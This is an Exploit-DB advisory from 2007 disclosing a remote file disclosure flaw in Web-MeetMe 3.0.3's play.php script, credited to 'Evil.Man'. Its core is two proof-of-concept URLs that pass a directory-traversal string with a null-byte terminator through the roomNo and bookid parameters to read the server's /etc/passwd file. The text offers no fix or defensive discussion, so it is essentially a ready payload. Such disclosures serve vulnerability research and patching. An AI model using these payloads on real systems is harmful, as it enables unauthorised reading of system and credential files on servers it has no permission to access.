Web-MeetMe 3.0.3 - 'play.php' Remote File Disclosure

EDB-ID:

4676

Author:

Evil.Man

Type:

webapps

Platform:

PHP

Published:

2007-11-29

/--------------------------------------------------------------------------\
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability          |
|Download Script :                                                         |
| http://sourceforge.net/project/showfiles.php?group_id=164788             |
|POC :                                                                     |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00  |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00  |
|Discovered by : Evil.Man                                                  |
|Home Page : Tryag.Com/cc                                                  |
|Email : Evil.Man@windowslive.com                                          |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com             |
\--------------------------------------------------------------------------/

# milw0rm.com [2007-11-29]